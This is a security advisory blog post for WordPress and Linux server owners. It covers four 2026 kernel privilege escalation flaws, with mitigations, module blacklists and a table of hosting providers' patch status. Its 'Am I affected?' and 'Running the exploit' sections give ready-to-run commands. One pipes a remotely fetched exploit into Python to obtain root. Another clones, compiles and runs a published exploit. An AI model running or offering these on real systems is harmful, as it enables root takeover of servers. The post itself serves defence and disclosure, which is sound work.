Table of Contents
Content Error or Suggest an Edit
Notice a grammatical error or technical inaccuracy? Let us know; we will give you credit!
Introduction
Crisis? Depending on who you talk to. For the most part if you’re using services with a provider who takes security seriously you can sit back and relax. If not, then you might need to investigate further and see if your servers are susceptible to these
If you run a Linux server — VPS, cloud instance, or shared hosting — the last eight weeks have been an uncomfortable reminder of how quickly the ground can shift under your stack. Four significant Linux local privilege escalation (LPE) exploits have dropped since March, each capable of turning a low-privileged foothold into full root access. Here’s what happened, what it means, and what you need to do.
What Is a Local Privilege Escalation?
A local privilege escalation exploit doesn’t give an attacker remote access on its own. What it does is take an attacker who already has limited access to your server and hand them the keys to the entire machine. Combined with any remote entry point, an LPE turns a nuisance into a catastrophe. If you run WordPress a local access through a compromised WordPress plugin, a weak password, a web shell, SSH, or Control Panel.
All four exploits covered here share a critical trait: they’re deterministic. No race conditions, no timing windows, no per-distro offsets. You run the exploit, you get root. Every time.
The Four Exploits
CrackArmor — March 12, 2026
Discovered by: Qualys Threat Research Unit
Source: Qualys Blog
CVEs: CVE-2026-23268 and others (9 vulnerabilities total)
CrackArmor is a collection of nine vulnerabilities in the Linux kernel’s AppArmor security module, disclosed by the Qualys Threat Research Unit. AppArmor is the default mandatory access control system on Ubuntu, Debian, and SUSE — meaning it’s running on a huge portion of WordPress hosting infrastructure.
The attack exploits a “confused deputy” flaw: an unprivileged user can manipulate privileged processes like sudo and postfix into writing attacker-controlled data to AppArmor’s pseudo-files under /sys/kernel/security/apparmor/. This allows security profiles to be silently removed, replaced, or weaponised. From there, the path to a root shell is straightforward.
Beyond basic privilege escalation, CrackArmor enables container breakout, denial-of-service via kernel stack exhaustion, and KASLR memory disclosure — making it particularly dangerous in shared and multi-tenant environments. It affects all Linux kernels since version 4.11 on any system running AppArmor.
Mitigation: Patch your kernel. Qualys recommends immediate kernel updates for Ubuntu, Debian, and SUSE, alongside monitoring /sys/kernel/security/apparmor/ for unexpected profile changes.
Copy Fail — April 29, 2026
Discovered by: Xint Code (Theori)
Source: copy.fail
Exploit code: GitHub — theori-io/copy-fail-CVE-2026-31431
CVE: CVE-2026-31431
Copy Fail is 732 bytes of Python. That’s it. The same script — unmodified — roots Ubuntu, Amazon Linux, RHEL, and SUSE. No race condition, no kernel-specific offsets, no dependencies beyond Python 3 and a standard kernel config. It has a 100% success rate on every affected system.
The vulnerability sits in the algif_aead module, part of the kernel’s userspace crypto API (AF_ALG). A logic flaw in how the module handles in-place memory operations allows a 4-byte write into the kernel page cache of any readable file. The exploit uses this to overwrite /usr/bin/su in memory — not on disk — with a stub that drops a root shell. Because the modification lives only in RAM, it won’t show up in file integrity checks.
Copy Fail was found by AI-assisted code analysis in about an hour of scan time against the Linux crypto subsystem. It was present in the kernel for nearly a decade before anyone caught it. CISA added it to its Known Exploited Vulnerabilities catalog, with a patch deadline of May 15, 2026 for US federal agencies.
Directly verified distributions
| Distribution | Kernel |
|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
| SUSE 16 | 6.12.0-160000.9-default |
Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, AlmaLinux — behave the same. Essentially any Linux distribution built since 2017 is in scope.
Am I affected?
You can verify with the following one-liner on a test system you own or are authorised to test:
curl https://copy.fail/exp | python3 && su
Do not run this on production. The exploit overwrites /usr/bin/su in the page cache — not on disk — but the resulting root shell is real. If you need to confirm exposure, test on an isolated VM first.
Mitigation
Patch first. Update your kernel to a version that includes mainline commit a664bf3d603d, which reverts the 2017 algif_aead in-place optimisation that introduced the flaw. Most major distributions are shipping the fix now. Until you can patch, disable the algif_aead module:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead
What does disabling algif_aead break?
For the vast majority of servers — nothing measurable.
- Will not affect: dm-crypt/LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly and don’t go through
AF_ALG. - May affect: userspace specifically configured to use
AF_ALG— e.g. OpenSSL with theafalgengine explicitly enabled, some embedded crypto offload paths, or applications that bindaead/skcipher/hashsockets directly. Check withlsof | grep AF_ALGorss -xaif unsure. - Performance:
AF_ALGis a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; affected applications fall back to their normal userspace crypto library.
For untrusted workloads (containers, sandboxes, CI runners), block AF_ALG socket creation via seccomp regardless of patch state.
Dirty Frag — May 7, 2026
Discovered by: Hyunwoo Kim (@v4bel)
Source: GitHub — V4bel/dirtyfrag
Exploit code: GitHub — V4bel/dirtyfrag/exp.c
CVEs: CVE-2026-43284, CVE-2026-43500
Dirty Frag builds directly on Copy Fail’s bug class, extending the page-cache write primitive into two new kernel subsystems: the ESP (IPsec) networking module and RxRPC. Crucially, it works even on systems where the Copy Fail mitigation has already been applied — if you blacklisted algif_aead and thought you were done, Dirty Frag renders that insufficient.
The exploit chains two separate vulnerabilities together, which is what makes it so universal. The ESP variant (CVE-2026-43284) requires namespace privileges but works on most distributions. The RxRPC variant (CVE-2026-43500) doesn’t require namespace privileges and is loaded by default on Ubuntu. Together they cover each other’s blind spots, meaning there’s no major distribution where at least one path isn’t available.
Dirty Frag was published ahead of schedule after its coordinated embargo was broken by a third party — patches were not yet available when the PoC dropped. Active in-the-wild exploitation was observed within days, with Microsoft documenting an attack chain involving SSH access, privilege escalation via a staged ELF binary, and subsequent tampering with LDAP config files and PHP session data.
Affected versions
- CVE-2026-43284 (xfrm-ESP): introduced in cac2661c53f3 (2017-01-17), patched in f4c50a4034e6 (2026-05-05)
- CVE-2026-43500 (RxRPC): introduced in 2dc334f1a63a (2023-06-08), patched in aa54b1d27fe0 (2026-05-10)
The effective lifetime of the ESP variant is approximately 9 years.
Directly verified distributions
| Distribution | Kernel |
|---|---|
| Ubuntu 24.04.4 | 6.17.0-23-generic |
| RHEL 10.1 | 6.12.0-124.49.1.el10_1.x86_64 |
| openSUSE Tumbleweed | 7.0.2-1-default |
| CentOS Stream 10 | 6.12.0-224.el10.x86_64 |
| AlmaLinux 10 | 6.12.0-124.52.3.el10_1.x86_64 |
| Fedora 44 | 6.19.14-300.fc44.x86_64 |
Running the exploit
Do not run this on systems you are not authorised to test. On a test system:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cleanup
⚠️ Important: After running the exploit, the page cache is contaminated. Clear it before leaving the machine or the next execution of su will re-trigger the root shell. Run:
echo 3 > /proc/sys/vm/drop_caches
or simply reboot.
Mitigation
Blacklist the affected modules and clear the page cache immediately:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Once your distribution backports the patch, apply the kernel update and reboot to load the fixed kernel. This mitigation also covers Fragnesia — the module blacklist is identical for both.
Fragnesia — May 13, 2026
Discovered by: William Bowling, V12 Team
Source: GitHub — v12-security/pocs/fragnesia
Exploit code: GitHub — v12-security/pocs/fragnesia
CVE: Not yet assigned
Fragnesia is the newest member of the Dirty Frag family, disclosed today. It targets the same ESP/XFRM subsystem surface as Dirty Frag but exploits a separate bug — a logic flaw where the kernel “forgets” that a fragment is shared during socket buffer coalescing. The same mitigation (blacklisting esp4, esp6, and rxrpc) covers Fragnesia, but it carries its own upstream patch.
The technique is similar to its predecessors: by transitioning a TCP socket to ESP-in-TCP ULP mode after data has been spliced from a file into the receive queue, the kernel processes the queued pages as ESP ciphertext and XORs a controllable keystream byte directly into the page cache. The exploit builds a lookup table to map desired output bytes to the required nonce, then iterates over a payload byte by byte, writing a root-shell stub over /usr/bin/su in memory without touching the disk.
Like Copy Fail and Dirty Frag, the modification is in-memory only — invisible to file integrity monitoring tools that check disk state. The affected kernel versions are the same as Dirty Frag: anything prior to May 13, 2026.
Mitigation: Same as Dirty Frag — blacklist the ESP and RxRPC modules. If you applied the Dirty Frag mitigation already, you’re covered for Fragnesia too.
What This Means for WordPress Server Owners
None of these exploits hand an attacker your server on their own. They all require local code execution first — a foothold obtained through some other means.
Step 1: Getting a Shell
Vulnerable Plugin or Theme With File Write Capability
Most modern hosts block dangerous PHP functions like exec(), shell_exec(), system(), and passthru() at the server level, which prevents an attacker from directly executing system commands. However, a plugin vulnerability that allows arbitrary file writes — uploading a web shell, for example — can still establish a foothold. Without those execution functions available, the attacker is limited in how far they can take it. The real danger comes when this vector is chained with another.
Compromised Hosting Panel or Control Panel Credentials
cPanel, Plesk, RunCloud, and similar panels often expose file managers, terminal access, and deployment tools. A stolen panel password can give an attacker far more leverage than a PHP exploit ever would, bypassing most server-level restrictions entirely. From a file manager, an attacker can edit php.ini or .htaccess to re-enable blocked functions like exec() and shell_exec(). Many panels also include a web-based terminal — giving effective SSH access directly from the browser without ever needing a shell credential. This makes a compromised control panel one of the highest-risk footholds for LPE chaining.
SCP and SFTP Access
Many hosts allow SCP or SFTP for file transfers without offering interactive SSH. An attacker with compromised credentials here can overwrite files and drop malicious scripts into the WordPress installation. However, uploading a PHP file alone isn’t enough to trigger an LPE — exec(), shell_exec(), or equivalent functions still need to be available for the exploit to execute. If those are blocked at the server level, SFTP/SCP access significantly limits how far the attacker can go without chaining another vector.
SSH Access
Where SSH is available, many hosts and server control panels place users in a jailed environment — GridPane and Enhance both implement jailed SSH, for example, restricting what the user can see and execute on the broader system. A properly configured jail significantly limits LPE exposure. However, jails are not always configured correctly, and self-managed VPS setups often offer full unrestricted SSH. In those environments, any of the exploits covered in this post can be triggered directly from the shell with no chaining required.
Step 2: The Privilege Escalation
The LPE is the second step. It’s what turns “attacker can run commands as a local user” into “attacker owns the entire server, including every other site on it.” The practical action list is short:
Check your hosting provider’s status
Major managed hosts and cloud platforms have been issuing advisories and live-patching fleets for all four vulnerabilities. If you’re on managed hosting, verify with your provider that patches have been applied — and that a reboot has actually occurred to load the new kernel.
Update your kernel and reboot.
This is the only complete fix. Patches are available for Ubuntu, Debian, RHEL, AlmaLinux, and most other major distributions for CrackArmor and Copy Fail. Dirty Frag and Fragnesia patches are being worked on — check your distribution’s security tracker for the latest kernel package.
Apply module blacklists as interim mitigations.
If you can’t reboot immediately, the module blacklists above reduce your exposure for Copy Fail (via algif_aead) and the Dirty Frag family (via esp4, esp6, rxrpc). For CrackArmor, apply the AppArmor-specific kernel and userspace patches from your vendor.
Harden your WordPress attack surface.
These exploits only matter if someone gets in first. Keep plugins and themes updated, remove anything unused, enforce strong SSH credentials or key-only authentication, and consider a web application firewall if you don’t already have one.
What This Means for Anyone Running a Linux Server
The four exploits covered in this post are not WordPress-specific problems. WordPress is simply one of the most common reasons someone ends up with a Linux server in the first place — but the underlying vulnerability is in the kernel itself. Any Linux server running an affected kernel is exposed, regardless of what software sits on top of it.
If you manage your own VPS, dedicated server, or bare-metal machine — whether it runs WordPress, a custom web application, a game server, a home lab, or anything else — the same risks apply and the same actions are required.
The threat model is also broader outside of WordPress. A WordPress site owner is mostly worried about attackers coming in through a plugin vulnerability or stolen credentials. A general Linux server owner has to consider a wider set of entry points: misconfigured services, exposed ports, outdated software with known CVEs, weak or reused passwords across SSH and other services, compromised API keys or tokens, and supply chain attacks via third-party packages or scripts. Any of these can provide the local foothold an LPE needs to become a full root compromise.
A few things worth paying attention to specifically:
Containers are not a complete barrier.
If you’re running Docker, LXC, or similar containers on a shared kernel, a guest with access to an unpatched host kernel can potentially exploit these vulnerabilities to break out of the container entirely. Kernel-level exploits don’t respect container boundaries the way they respect process boundaries. This is particularly relevant for anyone running multi-tenant workloads or shared hosting infrastructure.
VMs on unpatched hypervisors carry risk.
If you’re running virtual machines on a Proxmox host, a KVM box, or similar, and the host kernel is unpatched, any compromised guest with sufficient access could potentially escalate on the host. Patch and reboot the hypervisor — not just the guests.
Audit who has shell access.
These exploits require some form of local execution to trigger. Now is a good time to review who has SSH keys on your servers, whether any of those keys are shared or unused, and whether any accounts have more privilege than they need. Principle of least privilege limits the blast radius if a credential is compromised.
File integrity monitoring has a blind spot here.
Because Copy Fail, Dirty Frag, and Fragnesia all write to the kernel page cache rather than to disk, standard file integrity tools like AIDE or Tripwire won’t catch the modification. If you’re relying on those tools as your primary detection mechanism, they won’t alert you to an active exploitation of these vulnerabilities. Detection in this case comes from behavioural monitoring — unexpected root processes, anomalous network connections, or shell activity from unexpected users.
The action is the same regardless of workload: update the kernel, reboot to load it, and apply the module blacklists as an interim measure if a maintenance window isn’t immediately available.
A Pattern Worth Noting
What’s striking about the last eight weeks is not just that four LPEs dropped — it’s how they relate to each other. Copy Fail opened the door by demonstrating that the page-cache write bug class extends well beyond Dirty Pipe. Dirty Frag immediately followed, showing that the same sink exists in multiple kernel subsystems and that mitigating Copy Fail alone wasn’t enough. Fragnesia arrived days later, a third variant in the same surface discovered by a different team.
This isn’t a coincidence. Once a bug class is publicly demonstrated, researchers — and attackers — know where to look. Expect more variants in this family before the year is out.
WordPress Provider Coverage
Accurate as of May 13, 2026. Fragnesia was disclosed today — some provider responses are still emerging.
RunCloud
RunCloud published dedicated advisories for both Copy Fail and Dirty Frag and took a notably different approach to each.
| Exploit | Status | Notes |
|---|---|---|
| CrackArmor | No advisory | No public response at time of writing |
| Copy Fail | ✅ Auto-patched + advisory | Mitigation pushed platform-wide via agent. Servers that were offline or had the agent stopped at the time require a manual fix. Detection script provided. Advisory → |
| Dirty Frag | ⚠️ Advisory, manual fix required | Deliberately did not auto-push — disabling esp4, esp6, and rxrpc carries IPsec/AFS risk. Pre-check commands and rollback instructions provided. Advisory → |
| Fragnesia | No advisory yet | Covered by Dirty Frag mitigation if already applied |
If you’re on RunCloud, verify Security Updates is enabled under your server’s Auto Update settings. This is what allows the agent to push fixes automatically.
GridPane
GridPane has been quietly ahead of the curve on all three exploits disclosed so far, pushing patches platform-wide without requiring manual intervention from server owners.
| Exploit | Status | Notes |
|---|---|---|
| CrackArmor | No advisory found | No public response at time of writing |
| Copy Fail | ✅ Auto-patched | Ubuntu rolled out patches for 22.04 and 24.04; GridPane confirmed these were applied to all servers running Unattended Upgrades. GridPane also backported a fix for EOL 20.04 servers not covered by Ubuntu’s paid ESM. Post → |
| Dirty Frag | ✅ Auto-patched | Patch pushed platform-wide and applied to new server builds. Follow-on monitors deployed in case of reboot requirement. Post → |
| Fragnesia | ✅ Covered | Confirmed covered by the existing Dirty Frag patch — no additional action required. Post → |
GridPane uses jailed SSH by default, which reduces direct shell exploitation risk, but the platform’s proactive patching approach means most servers should already be protected.
Enhance
| Exploit | Status | Notes |
|---|---|---|
| CrackArmor | ⚠️ Partial mitigation | Covered under v12.21.5 hardening — setuid binaries hidden from website containers. Not a full fix; kernel update still required. Release notes → |
| Copy Fail | ⚠️ Partial mitigation | Covered under v12.21.5 hardening — setuid binaries hidden from website containers. Not a full fix; kernel update still required. Release notes → |
| Dirty Frag | ⚠️ Partial mitigation | Covered under v12.21.5 hardening — setuid binaries hidden from website containers. Not a full fix; kernel update still required. Release notes → |
| Fragnesia | ⚠️ Partial mitigation | Covered under v12.21.5 hardening — setuid binaries hidden from website containers. Not a full fix; kernel update still required. Release notes → |
Enhance shipped version 12.21.5 on May 8 specifically in response to this wave of LPE exploits. The release hides known setuid binaries from website containers, which limits the attack surface for anything originating from a compromised CMS or malicious site user — the most relevant threat vector for WordPress hosts. Enhance is clear that this is not a complete fix: it provides no protection against attacks originating outside an Enhance website container, and it does not replace keeping the underlying kernel patched. A system reboot is required after installing the updated packages to benefit from the change.
xCloud
xCloud pushed automated mitigations for both Copy Fail and Dirty Frag platform-wide via their existing security patch system, covering both xCloud-managed and self-managed (bring-your-own-server) setups. No action was required from server owners in either case.
| Exploit | Status | Notes |
|---|---|---|
| CrackArmor | No advisory | No public response at time of writing |
| Copy Fail | ✅ Auto-patched | v2.5.3, May 1. algif_aead module permanently blacklisted, safely unloaded, and verified blocked across all connected servers. No action required. Changelog → |
| Dirty Frag | ✅ Auto-patched | v2.5.5, May 8. Vulnerable kernel modules disabled and unloaded across all connected servers. No downtime or reboot required. Changelog → |
| Fragnesia | No advisory yet | Covered by Dirty Frag mitigation if already applied |
Cloudways
No public reporting, still looking for customer notifications. If you’re a customer, please reach out if you have communication from this company.
Rocket.net
No public reporting, still looking for customer notifications. If you’re a customer, please reach out if you have communication from this company.
Other Software
Accurate as of May 13, 2026.
Proxmox VE
| Exploit | Status | Notes |
|---|---|---|
| CrackArmor | No advisory found | No public response at time of writing |
| Copy Fail | ✅ Patched | Advisory PSA-2026-00018 published April 30. Patched kernels released for proxmox-kernel-6.8, 6.14, and 6.17. Module blacklist mitigation available for systems awaiting reboot. Advisories → |
| Dirty Frag | ✅ Patched | Advisory PSA-2026-00019-1 published May 8. Patched in proxmox-kernel-7.0.2-2-pve, 6.17.13-7-pve, and 6.14.11-8-pve. Module blacklist mitigation available. Advisories → |
| Fragnesia | No advisory yet | Covered by Dirty Frag mitigation if already applied |
Proxmox has no unprivileged user accounts by default, which limits the attack surface — but any account with shell access is enough for these exploits to run. Update proxmox-kernel-* packages and reboot to load the patched kernel.
Change Log
Last updated: May 13, 2026. All four exploits have public PoCs. Patch status varies by distribution — check your vendor’s security tracker for the most current kernel package versions.
Jordan Trask
With 20 years of experience in technology spanning Linux, Data Center Infrastructure, and related services and applications, Jordan consults with small, medium, and large organizations tackling technology problems and needs. With 10 years of experience in WordPress, he’s created Managing WP as a means of dumping his brain on the web.
Jordan operates LMT Solutions providing Technology Consulting Services and We Power WP for WordPress Care Plans and Support.
